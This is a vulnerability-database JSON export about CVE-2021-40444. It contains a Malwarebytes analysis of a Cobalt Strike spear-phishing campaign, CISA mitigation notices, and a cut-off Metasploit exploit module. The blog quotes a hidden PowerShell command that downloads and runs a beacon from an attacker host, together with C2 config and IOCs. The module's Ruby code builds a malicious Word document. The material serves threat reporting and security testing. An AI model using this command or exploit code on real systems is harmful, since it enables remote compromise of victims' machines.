"malwarebytes", "title": "Microsoft Office zero-day \u201cFollina\u201d\u2014it\u2019s not a bug, it\u2019s a feature! (It\u2019s a bug)", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-05-30T18:09:26", "id": "MALWAREBYTES:96F58422910DF7040786EDB21736E547", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/05/microsoft-office-zero-day-follina-its-not-a-bug-its-a-feature-its-a-bug/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-31T15:44:27", "description": "_This blog post was authored by Hossein Jazi._\n\n-- _Updated to clarify the two different campaigns (Cobalt Strike and Rat)_\n\nSeveral threat actors have taken advantage of the war in Ukraine to launch a number of cyber attacks. The Malwarebytes Threat Intelligence team is actively monitoring these threats and has observed activities associated with the geopolitical conflict.\n\nMore specifically, we&#x27;ve witnessed several APT actors such as [Mustang Panda](<https://twitter.com/h2jazi/status/1501198521139175427>), [UNC1151](<https://twitter.com/h2jazi/status/1500607147989684224>) and [SCARAB](<https://twitter.com/h2jazi/status/1505887653111209994>) that have used war-related themes to target mostly Ukraine. We&#x27;ve also observed several different [wipers](<https://blog.malwarebytes.com/threat-intelligence/2022/03/hermeticwiper-a-detailed-analysis-of-the-destructive-malware-that-targeted-ukraine/>) and cybercrime groups such as [FormBook](<https://blog.malwarebytes.com/threat-intelligence/2022/03/formbook-spam-campaign-targets-citizens-of-ukraine%EF%B8%8F/>) using the same tactics. Beside those known groups we saw an [actor](<https://twitter.com/h2jazi/status/1501941517409083397>) that used multiple methods to deploy a variants of Quasar Rat. These methods include using documents that exploit CVE-2017-0199 and CVE-2021-40444, macro-embedded documents, and executables. \n\nOn March 23, we identified a new campaign that instead of targeting Ukraine is focusing on Russian citizens and government entities. Based on the email content it is likely that the threat actor is targeting people that are against the Russian government.\n\nThe spear phishing emails are warning people that use websites, social networks, instant messengers and VPN services that have been banned by the Russian Government and that criminal charges will be laid. Victims are lured to open a malicious attachment or link to find out more, only to be infected with Cobalt Strike.\n\n## Spear phishing as the main initial infection vector\n\nThese emails pretend to be from the &quot;Ministry of Digital Development, Telecommunications and Mass Communications of the Russian Federation&quot; and &quot;Federal Service for Supervision of Communications, Information Technology and Mass Communications&quot; of Russia.\n\nWe have observed two documents associated with this campaign that both exploit CVE-2021-40444. Even though CVE-2021-40444 has been used in a few attacks in the past, to the best of our knowledge this was the first time we observed an attacker use RTF files instead of Word documents to exploit this vulnerability. Also the actor leveraged a new variant of this exploit called CABLESS in this attack. [Sophos](<https://news.sophos.com/en-us/2021/12/21/attackers-test-cab-less-40444-exploit-in-a-dry-run/>) has reported an attack that used a Cabless variant of this exploit but in that case the actor has not used the RTF file and also used RAR file to prepend the WSF data to it.\n\n * **Email with RTF file: **\n * _\u0424\u0435\u0434\u0435\u0440\u0430\u043b\u044c\u043d\u0430\u044f \u0441\u043b\u0443\u0436\u0431\u0430 \u043f\u043e \u043d\u0430\u0434\u0437\u043e\u0440\u0443 \u0432 \u0441\u0444\u0435\u0440\u0435 \u0441\u0432\u044f\u0437\u0438, \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u043e\u043d\u043d\u044b\u0445 \u0442\u0435\u0445\u043d\u043e\u043b\u043e\u0433\u0438\u0439 \u0438 \u043c\u0430\u0441\u0441\u043e\u0432\u044b\u0445 \u043a\u043e\u043c\u043c\u0443\u043d\u0438\u043a\u0430\u0446\u0438\u0439_ (Federal Service for Supervision of Communications, Information Technology and Mass Communications)\n * _\u041f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0436\u0434\u0435\u043d\u0438\u0435! \u041c\u0438\u043d\u0438\u0441\u0442\u0435\u0440\u0441\u0442\u0432\u043e \u0446\u0438\u0444\u0440\u043e\u0432\u043e\u0433\u043e \u0440\u0430\u0437\u0432\u0438\u0442\u0438\u044f, \u0441\u0432\u044f\u0437\u0438 \u0438 \u043c\u0430\u0441\u0441\u043e\u0432\u044b\u0445 \u043a\u043e\u043c\u043c\u0443\u043d\u0438\u043a\u0430\u0446\u0438\u0439 \u0420\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u043e\u0439 \u0424\u0435\u0434\u0435\u0440\u0430\u0446\u0438\u0438_ (A warning! Ministry of Digital Development, Telecommunications and Mass Media of the Russian Federation)\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/03/phish1-2.png> \"\" )Figure 1: Phishing template\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/03/phish2.png> \"\" )Figure 2: Phishing template \n\n * **Email with archive file:**\n * _\u0438\u043d\u0444\u043e\u0440\u043c\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u043d\u0430\u0441\u0435\u043b\u0435\u043d\u0438\u044f \u043e\u0431 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0445 \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u044f\u0445 \u0432 \u0441\u0444\u0435\u0440\u0435 \u0446\u0438\u0444\u0440\u043e\u0432\u044b\u0445 \u0442\u0435\u0445\u043d\u043e\u043b\u043e\u0433\u0438\u0439, \u0441\u0435\u0440\u0432\u0438\u0441\u043e\u0432, \u0441\u0430\u043d\u043a\u0446\u0438\u0439 \u0438 \u0443\u0433\u043e\u043b\u043e\u0432\u043d\u043e\u0439 \u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0435\u043d\u043d\u043e\u0441\u0442\u0438 \u0437\u0430 \u0438\u0445 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435_. (informing the public about critical changes in the field of digital technologies, services, sanctions and criminal liability for their use.)\n * _\u0412\u043d\u0438\u043c\u0430\u043d\u0438\u0435! \u0418\u043d\u0444\u043e\u0440\u043c\u0438\u0440\u0443\u0435\u0442 \u041c\u0438\u043d\u0438\u0441\u0442\u0435\u0440\u0441\u0442\u0432\u043e \u0446\u0438\u0444\u0440\u043e\u0432\u043e\u0433\u043e \u0440\u0430\u0437\u0432\u0438\u0442\u0438\u044f, \u0441\u0432\u044f\u0437\u0438 \u0438 \u043c\u0430\u0441\u0441\u043e\u0432\u044b\u0445 \u043a\u043e\u043c\u043c\u0443\u043d\u0438\u043a\u0430\u0446\u0438\u0439 \u0420\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u043e\u0439 \u0424\u0435\u0434\u0435\u0440\u0430\u0446\u0438\u0438_ (Attention! Informs the Ministry of Digital Development, Communications and Mass Media of the Russian Federation)\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/03/phish4.png> \"\" )Figure 3: Phishing template \n\n * **Email with link:**\n * _\u0412\u043d\u0438\u043c\u0430\u043d\u0438\u0435! \u0418\u043d\u0444\u043e\u0440\u043c\u0438\u0440\u0443\u0435\u0442 \u041c\u0438\u043d\u0438\u0441\u0442\u0435\u0440\u0441\u0442\u0432\u043e \u0446\u0438\u0444\u0440\u043e\u0432\u043e\u0433\u043e \u0440\u0430\u0437\u0432\u0438\u0442\u0438\u044f, \u0441\u0432\u044f\u0437\u0438 \u0438 \u043c\u0430\u0441\u0441\u043e\u0432\u044b\u0445 \u043a\u043e\u043c\u043c\u0443\u043d\u0438\u043a\u0430\u0446\u0438\u0439 \u0420\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u043e\u0439 \u0424\u0435\u0434\u0435\u0440\u0430\u0446\u0438\u0438_ (Attention! Informs the Ministry of Digital Development, Communications and Mass Media of the Russian Federation)\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/03/phish3.png> \"\" )Figure 4: phishing template \n\n## Victimology\n\nThe actor has sent its spear phishing emails to people that had email with these domains: \n\n_mail.ru, mvd.ru, yandex.ru, cap.ru, minobr-altai.ru, yandex.ru, stavminobr.ru, mon.alania.gov.ru, astrobl.ru, 38edu.ru, mosreg.ru, mo.udmr.ru, minobrnauki.gov.ru, 66.fskn.gov.ru, bk.ru, ukr.net_\n\nBased on these domains, here is the list of potential victims:\n\n * Portal of authorities of the Chuvash Republic Official Internet portal\n * Russian Ministry of Internal Affairs\n * ministry of education and science of the republic of Altai \n * Ministry of Education of the Stavropol Territory\n * Minister of Education and Science of the Republic of North Ossetia-Alania\n * Government of Astrakhan region \n * Ministry of Education of the Irkutsk region \n * Portal of the state and municipal service Moscow region \n * Ministry of science and higher education of the Russian Federation\n\n## Analysis:\n\nThe lures used by the threat actor are in Russian language and pretend to be from Russia&#x27;s &quot;Ministry of Information Technologies and Communications of the Russian Federation&quot; and &quot;MINISTRY OF DIGITAL DEVELOPMENT, COMMUNICATIONS AND MASS COMMUNICATIONS&quot;. One of them is a letter about limitation of access to Telegram application in Russia. \n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/03/russia.png> \"\" )Figure 5: Lure letter\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/03/cveblock.png> \"\" )Figure 6: Lure template\n\n \nThese RTF files contains an embedded url that downloads an html file which exploits the vulnerability in the MSHTML engine. \n`http://wallpaper.skin/office/updates/GtkjdsjkyLkjhsTYhdsd/exploit.html`\n\nThe html file contains a script that executes the script in WSF data embedded in the RTF file. \n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/03/Screen-Shot-2022-03-25-at-2.37.47-PM.png> \"\" )Figure 7: html file\n\n \nThe actor has added WSF data (Windows Script Host) at the start of the RTF file. As you can see from figure 8, WSF data contains a JScript code that can be accessed from a remote location. In this case this data has been accessed using the downloaded html exploit file. \n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/03/Screen-Shot-2022-03-25-at-1.43.00-PM.png> \"\" )Figure 8: WSF data\n\nExecuting this scripts leads to spawning PowerShell to download a CobaltStrike beacon from the remote server and execute it on the victim&#x27;s machine. (The deployed CobaltStrike file name is Putty) \n \n \n \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -windowstyle hidden $ProgressPreference = 'SilentlyContinue'; Invoke-WebRequest 'http://wallpaper.skin/office/updates/GtkjdsjkyLkjhsTYhdsd/putty.exe' -OutFile $env:TEMP\\putty.exe; . $env:TEMP\\putty.exe; Start-Sleep 15\n\nThe following shows the CobaltStrike config:\n \n \n {\n \"BeaconType\": [\n \"HTTPS\"\n ],\n \"Port\": 443,\n \"SleepTime\": 38500,\n \"MaxGetSize\": 1398151,\n \"Jitter\": 27,\n \"C2Server\": \"wikipedia-book.vote,/async/newtab_ogb\",\n \"HttpPostUri\": \"/gen_204\",\n \"Malleable_C2_Instructions\": [\n \"Remove 17 bytes from the end\",\n \"Remove 32 bytes from the beginning\",\n \"Base64 URL-safe decode\"\n ],\n \"SpawnTo\": \"/4jEZLD/DHKDj1CbBvlJIg==\",\n \"HttpGet_Verb\": \"GET\",\n \"HttpPost_Verb\": \"POST\",\n \"HttpPostChunk\": 96,\n \"Spawnto_x86\": \"%windir%\\\\syswow64\\\\gpupdate.exe\",\n \"Spawnto_x64\": \"%windir%\\\\sysnative\\\\gpupdate.exe\",\n \"CryptoScheme\": 0,\n \"Proxy_Behavior\": \"Use IE settings\",\n \"Watermark\": 1432529977,\n \"bStageCleanup\": \"True\",\n \"bCFGCaution\": \"True\",\n \"KillDate\": 0,\n \"bProcInject_StartRWX\": \"True\",\n \"bProcInject_UseRWX\": \"False\",\n \"bProcInject_MinAllocSize\": 16700,\n \"ProcInject_PrependAppend_x86\": [\n \"kJCQ\",\n \"Empty\"\n ],\n \"ProcInject_PrependAppend_x64\": [\n \"kJCQ\",\n \"Empty\"\n ],\n \"ProcInject_Execute\": [\n \"ntdll.dll:RtlUserThreadStart\",\n \"SetThreadContext\",\n \"NtQueueApcThread-s\",\n \"kernel32.dll:LoadLibraryA\",\n \"RtlCreateUserThread\"\n ],\n \"ProcInject_AllocationMethod\": \"NtMapViewOfSection\",\n \"bUsesCookies\": \"True\",\n \"HostHeader\": \"\"\n }\n\n## Similar lure used by another actor\n\nWe also have identified activity by another actor that uses a similar lure as the one used in the previously mentioned campaign. This activity is potentially related to [Carbon Spider](<https://www.virustotal.com/gui/domain/swordoke.com/community>) and uses &quot;_\u0424\u0435\u0434\u0435\u0440\u0430\u043b\u044c\u043d\u0430\u044f \u0441\u043b\u0443\u0436\u0431\u0430 \u043f\u043e \u043d\u0430\u0434\u0437\u043e\u0440\u0443 \u0432 \u0441\u0444\u0435\u0440\u0435 \u0441\u0432\u044f\u0437\u0438, \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u043e\u043d\u043d\u044b\u0445 \u0442\u0435\u0445\u043d\u043e\u043b\u043e\u0433\u0438\u0439 \u0438 \u043c\u0430\u0441\u0441\u043e\u0432\u044b\u0445 \u043a\u043e\u043c\u043c\u0443\u043d\u0438\u043a\u0430\u0446\u0438\u0439_&quot; (Federal Service for Supervision of Communications, Information Technology and Mass Communications) of Russia as a template. In this case, the threat actor has deployed a PowerShell-based Rat. \n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/03/block-doc1.png> \"\" )Figure 9: template\n\nThe dropped PowerShell script is obfuscated using a combination of Base64 and custom obfuscation. \n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/03/ps-dropped.png> \"\" )Figure 10: Dropped PS script\n\nAfter deobfuscating the script, you can see the Rat deployed by this actor. This PowerShell based Rat has the capability to get the next stage payload and execute it. The next stage payload can be one of the following file types:\n\n * JavaScript\n * PowerShell\n * Executable\n * DLL\n\nAll of Its communications with its server are in Base64 format. This Rat starts its activity by setting up some configurations which include the C2 url, intervals, debug mode and a parameter named group that initialized with &quot;Madagascar&quot; which probably is another alias of the actor. \n\nAfter setting up the configuration, it calls the &quot;Initialize-Engine&quot; function. This function collects the victim&#x27;s info including OS info, Username, Hostname, Bios info and also a host-domain value that shows if the machine in a domain member or not. It then appends all the collected into into a string and separate them by &quot;|&quot; character and at the end it add the group name and API config value. The created string is being send to the server using _Send-WebInit_ function. This function adds &quot;INIT%%%&quot; string to the created string and base64 encodes it and sends it to the server. \n\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/03/ps-deobfuscated.png> \"\" )Figure 11: PowerShell Rat\n\nAfter performing the initialization, it goes into a loop that keeps calling the &quot;Invoke-Engine&quot; function. This function checks the incoming tasks from the server, decodes them and calls the proper function to execute the incoming task. If there is no task to execute, it sends &quot;GETTASK%%&quot; in Base64 format to its server to show it is ready to get tasks and execute them. The &quot;IC&quot; command is used to delete itself.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/03/invoke-task.png> \"\" )Figure 12: Invoke task\n\nThe result of the task execution will be send to the server using &quot;PUTTASK%%&quot; command. \n\n## Infrastructure\n\nThe following shows the infrastructure used by this actor highlighting that the different lures are all connected. \n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/03/undefined.png> \"\" )Figure 12: Infrastructure \n\nThe Malwarebytes Threat Intelligence continues to monitor cyber attacks related to the Ukraine war. We are protecting our customers and sharing additional indicators of compromise.\n\n## IOCs\n\n**RTF files host domain: ** \ndigital-ministry[.]ru \n**RTF files:** \nPKH telegram.rtf \nb19af42ff8cf0f68e520a88f40ffd76f53a27dffa33b313fe22192813d383e1e \nPKH.rtf \n38f2b578a9da463f555614e9ca9036337dad0af4e03d89faf09b4227f035db20 \n**MSHTML exploit: ** \nwallpaper[.]skin/office/updates/GtkjdsjkyLkjhsTYhdsd/exploit.html \n4e1304f4589a706c60f1f367d804afecd3e08b08b7d5e6bd8c93384f0917385c \n**CobaltStrike Download URL:** \nwallpaper[.]skin/office/updates/GtkjdsjkyLkjhsTYhdsd/putty.exe \n**CobaltStrike:** \nPutty.exe \nd4eaf26969848d8027df7c8c638754f55437c0937fbf97d0d24cd20dd92ca66d \n**CobaltStrike C2:** \nwikipedia-book[.]vote/async/newtab_ogb \n**Macro based maldoc: \n**c7dd490adb297b7f529950778b5a426e8068ea2df58be5d8fd49fe55b5331e28 \n**PowerShell based RAT:** \n9d4640bde3daf44cc4258eb5f294ca478306aa5268c7d314fc5019cf783041f0** \nPowerShell Rat C2:** \nswordoke[.]com** \n** \n \n\n\n \n\n\nThe post [New spear phishing campaign targets Russian dissidents](<https://blog.malwarebytes.com/threat-intelligence/2022/03/new-spear-phishing-campaign-targets-russian-dissidents/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-03-29T18:02:48", "type": "malwarebytes", "title": "New spear phishing campaign targets Russian dissidents", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0199", "CVE-2021-40444"], "modified": "2022-03-29T18:02:48", "id": "MALWAREBYTES:FC8647475CCD473D01B5C0257286E101", "href": "https://blog.malwarebytes.com/threat-intelligence/2022/03/new-spear-phishing-campaign-targets-russian-dissidents/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cisa": [{"lastseen": "2021-11-26T18:09:51", "description": "Microsoft has released mitigations and workarounds to address a remote code execution vulnerability (CVE-2021-40444) in Microsoft Windows. Exploitation of this vulnerability may allow a remote attacker to take control of an affected system. This vulnerability has been detected in exploits in the wild. \n\nCISA encourages users and administrators to review [Microsoft\u2019s advisory](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444 >) and to implement the mitigations and workarounds.\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/09/07/microsoft-releases-mitigations-and-workarounds-cve-2021-40444>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-07T00:00:00", "type": "cisa", "title": "Microsoft Releases Mitigations and Workarounds for CVE-2021-40444 ", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-07T00:00:00", "id": "CISA:C70D91615E3DC8B589B493118D474566", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/09/07/microsoft-releases-mitigations-and-workarounds-cve-2021-40444", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-03T13:56:12", "description": "Microsoft has released workaround guidance to address a remote code execution (RCE) vulnerability\u2014CVE-2022-30190, known as \"Follina\"\u2014affecting the Microsoft Support Diagnostic Tool (MSDT) in Windows. A remote, unauthenticated attacker could exploit this vulnerability to take control of an affected system. Microsoft has reported active exploitation of this vulnerability in the wild.\n\nCISA urges users and administrators to review Microsoft's [Guidance for CVE-2022-30190 Microsoft Support Diagnostic Tool Vulnerability](<https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/>) and apply the necessary workaround. \n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2022/05/31/microsoft-releases-workaround-guidance-msdt-follina-vulnerability>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-31T00:00:00", "type": "cisa", "title": "Microsoft Releases Workaround Guidance for MSDT \"Follina\" Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-05-31T00:00:00", "id": "CISA:F30D0D7B72453DC3FC64D2AC1AA31F33", "href": "https://us-cert.cisa.gov/ncas/current-activity/2022/05/31/microsoft-releases-workaround-guidance-msdt-follina-vulnerability", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2023-06-24T15:44:17", "description": "This module creates a malicious docx file that when opened in Word on a vulnerable Windows system will lead to code execution. This vulnerability exists because an attacker can craft a malicious ActiveX control to be used by a Microsoft Office document that hosts the browser rendering engine.\n", "cvss3": {}, "published": "2021-11-09T11:18:58", "type": "metasploit", "title": "Microsoft Office Word Malicious MSHTML RCE", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2021-12-08T22:22:44", "id": "MSF:EXPLOIT-WINDOWS-FILEFORMAT-WORD_MSHTML_RCE-", "href": "https://www.rapid7.com/db/modules/exploit/windows/fileformat/word_mshtml_rce/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::FILEFORMAT\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Microsoft Office Word Malicious MSHTML RCE',\n 'Description' => %q{\n This module creates a malicious docx file that when opened in Word on a vulnerable Windows\n system will lead to code execution. This vulnerability exists because an attacker can\n craft a malicious ActiveX control to be used by a Microsoft Office document that hosts\n the browser rendering engine.\n },\n 'References' => [\n ['CVE', '2021-40444'],\n ['URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444'],\n ['URL', 'https://www.sentinelone.com/blog/peeking-into-cve-2021-40444-ms-office-zero-day-vulnerability-exploited-in-the-wild/'],\n ['URL', 'http://download.microsoft.com/download/4/d/a/4da14f27-b4ef-4170-a6e6-5b1ef85b1baa/[ms-cab].pdf'],\n ['URL', 'https://github.com/lockedbyte/CVE-2021-40444/blob/master/REPRODUCE.md'],\n ['URL', 'https://github.com/klezVirus/CVE-2021-40444']\n ],\n 'Author' => [\n 'lockedbyte ', # Vulnerability discovery.\n 'klezVirus ', # References and PoC.\n 'thesunRider', # Official Metasploit module.\n 'mekhalleh (RAMELLA S\u00e9bastien)' # Zeop-CyberSecurity - code base contribution and refactoring.\n ],\n 'DisclosureDate' => '2021-09-23',\n 'License' => MSF_LICENSE,\n 'Privileged' => false,\n 'Platform' => 'win',\n 'Arch' => [ARCH_X64],\n 'Payload' => {\n 'DisableNops' => true\n },\n 'DefaultOptions' => {\n 'FILENAME' => 'msf.docx'\n },\n 'Targets' => [\n [\n 'Hosted', {}\n ]\n ],\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [UNRELIABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptBool.new('OBFUSCATE', [true, 'Obfuscate JavaScript content.', true])\n ])\n register_advanced_options([\n OptPath.new('DocxTemplate', [ false, 'A DOCX file that will be used as a template to build the exploit.' ]),\n ])\n end\n\n def bin_to_hex(bstr)\n return(bstr.each_byte.map { |b| b.to_s(16).rjust(2, '0') }.join)\n end\n\n def cab_checksum(data, seed = \"\\x00\\x00\\x00\\x00\")\n checksum = seed\n\n bytes = ''\n data.chars.each_slice(4).map(&:join).each do |dword|\n if dword.length == 4\n checksum = checksum.unpack('C*').zip(dword.unpack('C*')).map { |a, b| a ^ b }.pack('C*')\n else\n bytes = dword\n end\n end\n checksum = checksum.reverse\n\n case (data.length % 4)\n when 3\n dword = \"\\x00#{bytes}\"\n when 2\n dword = \"\\x00\\x00#{bytes}\"\n when 1\n dword = \"\\x00\\x00\\x00#{bytes}\"\n else\n dword = \"\\x00\\x00\\x00\\x00\"\n end\n\n checksum = checksum.unpack('C*').zip(dword.unpack('C*')).map { |a, b| a ^ b }.pack('C*').reverse\n end\n\n # http://download.microsoft.com/download/4/d/a/4da14f27-b4ef-4170-a6e6-5b1ef85b1baa/[ms-cab].pdf\n def create_cab(data)\n cab_cfdata = ''\n filename = \"../#{File.basename(@my_resources.first)}.inf\"\n block_size = 32768\n struct_cffile = 0xd\n struct_cfheader = 0x30\n\n block_counter = 0\n data.chars.each_slice(block_size).map(&:join).each do |block|\n block_counter += 1\n\n seed = \"#{[block.length].pack('S')}#{[block.length].pack('S')}\"\n csum = cab_checksum(block, seed)\n\n vprint_status(\"Data block added w/ checksum: #{bin_to_hex(csum)}\")\n cab_cfdata << csum # uint32 {4} - Checksum\n cab_cfdata << [block.length].pack('S') # uint16 {2} - Compressed Data Length\n cab_cfdata << [block.length].pack('S') # uint16 {2} - Uncompressed Data Length\n cab_cfdata << block\n end\n\n cab_size = [\n struct_cfheader +\n struct_cffile +\n filename.length +\n cab_cfdata.length\n ].pack('L<')\n\n # CFHEADER (http://wiki.xentax.com/index.php/Microsoft_Cabinet_CAB)\n cab_header = \"\\x4D\\x53\\x43\\x46\" # uint32 {4} - Header (MSCF)\n cab_header << \"\\x00\\x00\\x00\\x00\" # uint32 {4} - Reserved (null)\n cab_header << cab_size # uint32 {4} - Archive Length\n cab_header << \"\\x00\\x00\\x00\\x00\" # uint32 {4} - Reserved (null)\n\n cab_header << \"\\x2C\\x00\\x00\\x00\" # uint32 {4} - Offset to the first CFFILE\n cab_header << \"\\x00\\x00\\x00\\x00\" # uint32 {4} - Reserved (null)\n cab_header << \"\\x03\" # byte {1} - Minor Version (3)\n cab_header << \"\\x01\" # byte {1} - Major Version (1)\n cab_header << \"\\x01\\x00\" # uint16 {2} - Number of Folders\n cab_header << \"\\x01\\x00\" # uint16 {2} - Number of Files\n cab_header << \"\\x00\\x00\" # uint16 {2} - Flags\n\n cab_header << \"\\xD2\\x04\" # uint16 {2} - Cabinet Set ID Number\n cab_header << \"\\x00\\x00\" # uint16 {2} - Sequential Number of this Cabinet file in a Set\n\n # CFFOLDER\n cab_header << [ # uint32 {4} - Offset to the first CFDATA in this Folder\n struct_cfheader +\n struct_cffile +\n filename.length\n ].pack('L<')\n cab_header << [block_counter].pack('S<') # uint16 {2} - Number of CFDATA blocks in this Folder\n cab_header << \"\\x00\\x00\" # uint16 {2} - Compression Format for each CFDATA in this Folder (1 = MSZIP)\n\n # increase file size to trigger vulnerability\n cab_header << [ # uint32 {4} - Uncompressed File Length (\"\\x02\\x00\\x5C\\x41\")\n data.length + 1073741824\n ].pack('L<')\n\n # set current date and time in the format of cab file\n date_time = Time.new\n date = [((date_time.year - 1980) << 9) + (date_time.month << 5) + date_time.day].pack('S')\n time = [(date_time.hour << 11) + (date_time.min << 5) + (date_time.sec / 2)].pack('S')\n\n # CFFILE\n cab_header << \"\\x00\\x00\\x00\\x00\" # uint32 